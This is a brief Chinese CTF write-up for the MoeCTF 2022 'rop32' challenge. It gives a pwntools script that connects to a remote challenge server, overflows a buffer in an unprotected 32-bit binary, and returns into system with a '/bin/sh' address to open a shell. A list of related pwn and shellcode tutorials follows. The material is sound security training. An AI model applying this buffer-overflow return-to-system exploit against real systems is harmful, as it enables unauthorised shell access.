[MoeCTF 2022]rop32-入土为安的第十八天

简介: [MoeCTF 2022]rop32-入土为安的第十八天

无保护32位

from pwn import *
io = remote('node5.anna.nssctf.cn',26770)
 
bin_addr =0x804C024
sys_addr =0x80491E7
payload =b'A'*(0x1c +4) +p32(sys_addr) +p32(bin_addr)
 
io.sendline(payload)
io.interactive()


目录
相关文章
|
7月前
|
Shell
CTFHubret2shellcode-入土为安的第十三天
CTFHubret2shellcode-入土为安的第十三天
71 0
|
7月前
|
前端开发 rax Shell
Shellcode Injection(√)
Shellcode Injection(√)
108 0
|
NoSQL 安全 Shell
简单的PWN学习-ret2shellcode
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
|
物联网 Linux C语言
Execve 函数|学习笔记
快速学习 Execve 函数
|
Linux
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例(下)
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例
261 0
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例(下)
|
Shell Linux
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(下)
[PWN][进阶篇]ROP_Ret2Shellcode-32实例
195 0
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(下)
|
前端开发 rax Shell
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例(上)
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例
433 0
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例(上)
|
安全 Shell Linux
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(上)
[PWN][进阶篇]ROP_Ret2Shellcode-32实例
223 0
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(上)
|
NoSQL Shell
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护(下)
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护
152 0
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护(下)
|
安全 Shell
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护(上)
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护
235 0
[PWN][高级篇]利用ROP-ret2Syscall突破NX保护(上)